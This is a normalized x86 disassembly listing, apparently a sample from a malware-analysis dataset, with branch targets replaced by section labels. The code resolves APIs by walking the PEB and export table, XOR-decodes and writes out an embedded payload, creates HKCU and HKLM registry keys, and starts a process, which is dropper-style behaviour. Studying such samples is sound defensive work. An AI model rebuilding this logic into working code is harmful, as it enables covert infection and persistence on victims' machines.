mov edx [ ebp - 0x130 ]
movsx eax [ ebp + edx - 0x120 ]
test eax eax
je rwxdata
mov ecx [ ebp - 0x554 ]
add ecx 0x1
mov [ ebp - 0x554 ] ecx
mov edx [ ebp - 0x2b0 ]
add edx 0x1
mov [ ebp - 0x2b0 ] edx
mov ecx [ ebp - 0x130 ]
mov [ ebp + ecx - 0x530 ] 0x20
mov edx [ ebp - 0x130 ]
add edx 0x1
mov [ ebp - 0x130 ] edx
mov eax [ ebp - 0x130 ]
mov [ ebp + eax - 0x530 ] 0x2f
mov ecx [ ebp - 0x130 ]
add ecx 0x1
mov [ ebp - 0x130 ] ecx
mov [ ebp - 0x290 ] 0x0
jmp rwxdata
mov ecx [ ebp - 0x130 ]
mov edx [ ebp - 0x130 ]
mov al [ ebp + edx - 0x120 ]
mov [ ebp + ecx - 0x530 ] al
jmp rwxdata
mov eax [ ebp - 0x148 ]
movsx ecx [ eax ]
cmp ecx 0x26
je rwxdata
mov ecx [ ebp - 0x130 ]
add ecx 0x1
mov [ ebp - 0x130 ] ecx
mov ecx [ ebp - 0x130 ]
mov [ ebp + ecx - 0x530 ] 0x0
mov edx [ ebp - 0x148 ]
add edx 0x1
mov [ ebp - 0x148 ] edx
mov eax [ ebp - 0x264 ]
push eax
call sub_45be90
add esp 0x4
mov ecx [ ebp - 0x144 ]
and ecx 0x1
je rwxdata
mov edx [ ebp - 0x290 ]
imul edx edx 0xa
mov eax [ ebp - 0x148 ]
movsx ecx [ eax ]
lea edx [ edx + ecx - 0x30 ]
mov [ ebp - 0x290 ] edx
mov eax [ ebp - 0x130 ]
mov ecx [ ebp - 0x148 ]
mov dl [ ecx ]
mov [ ebp + eax - 0x530 ] dl
mov eax [ ebp - 0x130 ]
add eax 0x1
mov [ ebp - 0x130 ] eax
jmp rwxdata
push 0x0
push 0x80
push 0x2
push 0x0
push 0x1
push 0x40000000
lea eax [ ebp - 0x120 ]
push eax
call [ ebp - 0x418 ]
mov [ ebp - 0x558 ] eax
cmp [ ebp - 0x558 ] 0xffffffff
je rwxdata
mov edx [ ebp - 0x144 ]
and edx 0x10
je rwxdata
mov edx [ ebp - 0x148 ]
add edx 0x1
mov [ ebp - 0x148 ] edx
push 0x37b18
mov ecx [ ebp - 0x148 ]
push ecx
call sub_45bfc0
add esp 0x8
push 0x0
lea edx [ ebp - 0x550 ]
push edx
push 0x37b18
mov eax [ ebp - 0x148 ]
push eax
mov ecx [ ebp - 0x558 ]
push ecx
call [ ebp - 0x28c ]
mov edx [ ebp - 0x558 ]
push edx
call [ ebp - 0x13c ]
mov eax [ ebp - 0x144 ]
and eax 0x100
je rwxdata
lea eax [ ebp - 0x27c ]
push eax
lea ecx [ ebp - 0x138 ]
push ecx
push 0x0
push 0xf003f
push 0x0
push 0x0
push 0x0
mov edx [ ebp - 0x264 ]
push edx
push 0x80000001
call [ ebp - 0x4 ]
mov [ ebp - 0x2b4 ] eax
lea eax [ ebp - 0x27c ]
push eax
lea ecx [ ebp - 0x138 ]
push ecx
push 0x0
push 0xf003f
push 0x0
push 0x0
push 0x0
mov edx [ ebp - 0x264 ]
push edx
push 0x80000002
call [ ebp - 0x4 ]
mov [ ebp - 0x2b4 ] eax
jmp rwxdata
mov [ ebp - 0x574 ] 0x44
mov [ ebp - 0x130 ] 0x0
jmp rwxdata
cmp [ ebp - 0x2b4 ] 0x0
jne rwxdata
mov [ ebp - 0x300 ] 0x44
mov [ ebp - 0x2d4 ] 0x81
mov eax [ ebp - 0x144 ]
and eax 0x1000
je rwxdata
mov ecx [ ebp - 0x574 ]
sub ecx 0x1
mov [ ebp - 0x574 ] ecx
mov edx [ ebp - 0x574 ]
mov [ ebp + edx - 0x300 ] 0x0
jmp rwxdata
cmp [ ebp - 0x130 ] 0xa
jae rwxdata
mov edx 0x5
mov [ ebp - 0x2d0 ] dx
xor ecx ecx
mov [ ebp - 0x2d0 ] cx
jmp rwxdata
cmp [ ebp - 0x574 ] 0x0
je rwxdata
cmp [ ebp - 0x2b4 ] 0x0
jne rwxdata
lea ecx [ ebp - 0x134 ]
push ecx
lea edx [ ebp - 0x410 ]
push edx
lea eax [ ebp - 0x10 ]
push eax
push 0x0
lea ecx [ ebp - 0x260 ]
push ecx
mov edx [ ebp - 0x138 ]
push edx
call [ ebp - 0x414 ]
mov [ ebp - 0x2b4 ] eax
cmp [ ebp - 0x2b4 ] 0x0
jne rwxdata
lea eax [ ebp - 0x278 ]
push eax
lea ecx [ ebp - 0x300 ]
push ecx
push 0x0
push 0x0
push 0x20
push 0x0
push 0x0
push 0x0
lea edx [ ebp - 0x120 ]
push edx
push 0x0
call [ ebp - 0x55c ]
mov [ ebp - 0x2ac ] 0x0
jmp rwxdata
mov [ ebp - 0x130 ] 0x0
jmp rwxdata
jmp rwxdata
jmp rwxdata
mov ecx [ ebp - 0x2ac ]
movsx edx [ ebp + ecx - 0x530 ]
test edx edx
je rwxdata
mov ecx [ ebp - 0x130 ]
movsx edx [ ebp + ecx - 0x410 ]
cmp edx 0x2f
je rwxdata
mov eax [ ebp - 0x130 ]
add eax 0x1
mov [ ebp - 0x130 ] eax
mov eax [ ebp - 0x18 ]
cmp eax [ ebp - 0x290 ]
jae rwxdata
jmp rwxdata
mov edx [ ebp - 0x130 ]
movsx eax [ ebp + edx - 0x410 ]
cmp eax 0x2f
jne rwxdata
mov eax [ ebp - 0x130 ]
movsx ecx [ ebp + eax - 0x410 ]
test ecx ecx
je rwxdata
mov edx [ ebp - 0x138 ]
push edx
call [ ebp - 0x534 ]
mov ecx [ ebp - 0x2ac ]
push ecx
lea edx [ ebp - 0x530 ]
push edx
push 0x1
push 0x0
lea eax [ ebp - 0x260 ]
push eax
mov ecx [ ebp - 0x138 ]
push ecx
call [ ebp - 0x268 ]
mov [ ebp - 0x2b4 ] eax
mov eax [ ebp - 0x2ac ]
add eax 0x1
mov [ ebp - 0x2ac ] eax
mov ecx [ ebp - 0x130 ]
add ecx 0x1
mov [ ebp - 0x130 ] ecx
jmp rwxdata
jmp rwxdata
mov eax [ ebp - 0x130 ]
movsx ecx [ ebp + eax - 0x410 ]
test ecx ecx
je rwxdata
mov eax [ ebp - 0x130 ]
add eax 0x1
mov [ ebp - 0x130 ] eax
mov edx [ ebp - 0x18 ]
imul edx edx 0xa
mov eax [ ebp - 0x130 ]
movsx ecx [ ebp + eax - 0x410 ]
lea edx [ edx + ecx - 0x30 ]
mov [ ebp - 0x18 ] edx
jmp rwxdata
mov edx [ ebp - 0x130 ]
add edx 0x1
mov [ ebp - 0x130 ] edx
sub_45be90
push ebp
mov ebp esp
sub esp 0x24
mov [ ebp - 0x14 ] 0x1
mov [ ebp - 0x13 ] 0x1
mov [ ebp - 0x12 ] 0x2
mov [ ebp - 0x11 ] 0x10
mov [ ebp - 0x10 ] 0x4
mov [ ebp - 0xf ] 0x4
mov [ ebp - 0xe ] 0x8
mov [ ebp - 0xd ] 0x8
mov [ ebp - 0xc ] 0x10
mov [ ebp - 0xb ] 0x2
mov [ ebp - 0xa ] 0x20
mov [ ebp - 0x9 ] 0x40
mov [ ebp - 0x8 ] 0x40
mov [ ebp - 0x7 ] 0x20
mov [ ebp - 0x6 ] 0x80
mov [ ebp - 0x5 ] 0x80
mov [ ebp - 0x4 ] 0x0
jmp rwxdata
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0x4 ]
movsx edx [ ecx ]
test edx edx
je rwxdata
mov [ ebp - 0x1c ] 0x0
jmp rwxdata
jmp rwxdata
mov ecx [ ebp - 0x1c ]
cmp ecx [ ebp - 0x4 ]
jge rwxdata
mov eax [ ebp - 0x4 ]
add eax 0x1
mov [ ebp - 0x4 ] eax
mov ecx [ ebp - 0x4 ]
sub ecx 0x1
mov [ ebp - 0x4 ] ecx
jmp rwxdata
mov [ ebp - 0x15 ] 0x0
mov [ ebp - 0x20 ] 0x0
jmp rwxdata
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x4 ]
movsx ecx [ eax ]
cmp ecx 0x20
jne rwxdata
cmp [ ebp - 0x20 ] 0x8
jge rwxdata
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x4 ]
mov [ edx + 0x1 ] 0x0
mov esp ebp
pop ebp
retn
cmp [ ebp - 0x4 ] 0x0
jle rwxdata
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x1c ]
mov al [ ebp - 0x15 ]
mov [ edx ] al
jmp rwxdata
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x1c ]
movsx ecx [ eax ]
mov edx [ ebp - 0x20 ]
movzx eax [ ebp + edx * 2 - 0x14 ]
and ecx eax
je rwxdata
jmp rwxdata
mov eax [ ebp - 0x1c ]
add eax 0x1
mov [ ebp - 0x1c ] eax
movzx ecx [ ebp - 0x15 ]
mov edx [ ebp - 0x20 ]
movzx eax [ ebp + edx * 2 - 0x13 ]
not eax
and ecx eax
mov [ ebp - 0x24 ] ecx
movzx ecx [ ebp - 0x15 ]
mov edx [ ebp - 0x20 ]
movzx eax [ ebp + edx * 2 - 0x13 ]
or ecx eax
mov [ ebp - 0x24 ] ecx
jmp rwxdata
mov edx [ ebp - 0x4 ]
sub edx 0x1
mov [ ebp - 0x4 ] edx
mov edx [ ebp - 0x20 ]
add edx 0x1
mov [ ebp - 0x20 ] edx
mov cl [ ebp - 0x24 ]
mov [ ebp - 0x15 ] cl
jmp rwxdata
sub_45bfc0
push ebp
mov ebp esp
push ecx
mov [ ebp - 0x4 ] 0x0
mov [ ebp - 0x4 ] 0x0
jmp rwxdata
mov ecx [ ebp - 0x4 ]
cmp ecx [ ebp + 0xc ]
jge rwxdata
mov esp ebp
pop ebp
retn
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x4 ]
movzx eax [ edx ]
cmp eax 0x64
jne rwxdata
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x4 ]
movzx eax [ edx ]
xor eax 0x80be78ab
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0x4 ]
mov [ ecx ] al
jmp rwxdata
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0x4 ]
movzx edx [ ecx + 0x1 ]
cmp edx 0x7d
jne rwxdata
mov eax [ ebp - 0x4 ]
add eax 0x1
mov [ ebp - 0x4 ] eax
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x4 ]
movzx ecx [ eax + 0x2 ]
cmp ecx 0x77
jne rwxdata
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x4 ]
movzx eax [ edx + 0x6 ]
cmp eax 0x61
jne rwxdata
mov ecx [ ebp - 0x4 ]
add ecx 0x3e4
mov [ ebp - 0x4 ] ecx
sub_45c050
push ebp
mov ebp esp
push ecx
mov eax [ fs : 0x30 ]
mov eax [ eax + 0xc ]
mov eax [ eax + 0xc ]
mov eax [ eax ]
mov eax [ eax ]
mov eax [ eax + 0x18 ]
mov [ ebp - 0x4 ] eax
mov eax [ ebp - 0x4 ]
mov esp ebp
pop ebp
retn
sub_45c080
push ebp
mov ebp esp
sub esp 0x30
mov eax [ ebp + 0x8 ]
mov [ ebp - 0x10 ] eax
mov ecx [ ebp - 0x10 ]
mov [ ebp - 0x14 ] ecx
mov edx [ ebp - 0x14 ]
mov eax [ ebp - 0x10 ]
add eax [ edx + 0x3c ]
mov [ ebp - 0xc ] eax
mov ecx [ ebp - 0xc ]
mov edx [ ebp - 0x10 ]
add edx [ ecx + 0x78 ]
mov [ ebp - 0x4 ] edx
mov [ ebp - 0x8 ] 0x0
jmp rwxdata
mov ecx [ ebp - 0x4 ]
mov edx [ ebp - 0x8 ]
cmp edx [ ecx + 0x18 ]
jae rwxdata
xor eax eax
mov eax [ ebp - 0x4 ]
mov ecx [ eax + 0x20 ]
add ecx [ ebp - 0x10 ]
mov edx [ ebp - 0x8 ]
mov eax [ ecx + edx * 4 ]
add eax [ ebp - 0x10 ]
mov [ ebp - 0x18 ] eax
mov ecx [ ebp - 0x18 ]
mov [ ebp - 0x20 ] ecx
mov edx [ ebp + 0xc ]
mov [ ebp - 0x24 ] edx
sbb eax eax
sbb eax 0xffffffff
mov [ ebp - 0x2c ] eax
cmp [ ebp - 0x25 ] 0x0
je rwxdata
jmp rwxdata
mov edx [ ebp - 0x4 ]
mov eax [ edx + 0x24 ]
add eax [ ebp - 0x10 ]
mov ecx [ ebp - 0x8 ]
mov dx [ eax + ecx * 2 ]
mov [ ebp - 0x1c ] dx
mov eax [ ebp - 0x4 ]
mov ecx [ eax + 0x1c ]
add ecx [ ebp - 0x10 ]
movzx edx [ ebp - 0x1c ]
mov eax [ ecx + edx * 4 ]
add eax [ ebp - 0x10 ]
jmp rwxdata
mov [ ebp - 0x2c ] 0x0
jmp rwxdata
mov eax [ ebp - 0x24 ]
mov cl [ eax + 0x1 ]
mov [ ebp - 0x26 ] cl
mov edx [ ebp - 0x20 ]
cmp cl [ edx + 0x1 ]
jne rwxdata
mov eax [ ebp - 0x8 ]
add eax 0x1
mov [ ebp - 0x8 ] eax
mov esp ebp
pop ebp
retn
mov ecx [ ebp - 0x2c ]
mov [ ebp - 0x30 ] ecx
cmp [ ebp - 0x30 ] 0x0
jne rwxdata
add [ ebp - 0x24 ] 0x2
add [ ebp - 0x20 ] 0x2
cmp [ ebp - 0x26 ] 0x0
jne rwxdata
mov eax [ ebp - 0x24 ]
mov cl [ eax ]
mov [ ebp - 0x25 ] cl
mov edx [ ebp - 0x20 ]
cmp cl [ edx ]
jne rwxdata
sub_40135a
push [ esp + 0x8 ]
call sub_4013f3
pop ecx
retn
sub_401365
push [ esp + 0x8 ]
call sub_40140e
pop ecx
retn
sub_4013d2
mov eax rw-data
retn
sub_4013f3
xor eax eax
cmp [ esp + 0x4 ] eax
jbe r-xdata
retn
push [ esp + 0x4 ]
push eax
call [ GetProcessHeap@IAT ]
push eax
call [ HeapAlloc@IAT ]
sub_40140e
cmp [ esp + 0x4 ] 0x0
je r-xdata
retn
push [ esp + 0x4 ]
push 0x0
call [ GetProcessHeap@IAT ]
push eax
call [ HeapFree@IAT ]
sub_4014e8
mov eax [ esp + 0x4 ]
xor ecx ecx
cmp [ esp + 0xc ] ecx
jbe r-xdata
retn
mov edx [ esp + 0x8 ]
mov dl [ ecx + edx ]
mov [ ecx + eax ] dl
inc ecx
cmp ecx [ esp + 0xc ]
jb r-xdata
sub_40289d
mov eax [ esp + 0x4 ]
and [ eax + 0x24 ] 0x0
push 0x1
push 0x1
push eax
call sub_402872
add esp 0xc
retn
sub_402b4a
mov eax [ esp + 0x8 ]
push esi
mov esi [ esp + 0x8 ]
push [ esi + 0x10 ]
push eax
call [ eax + 0x4 ]
and [ esi + 0x10 ] 0x0
pop ecx
pop ecx
pop esi
retn
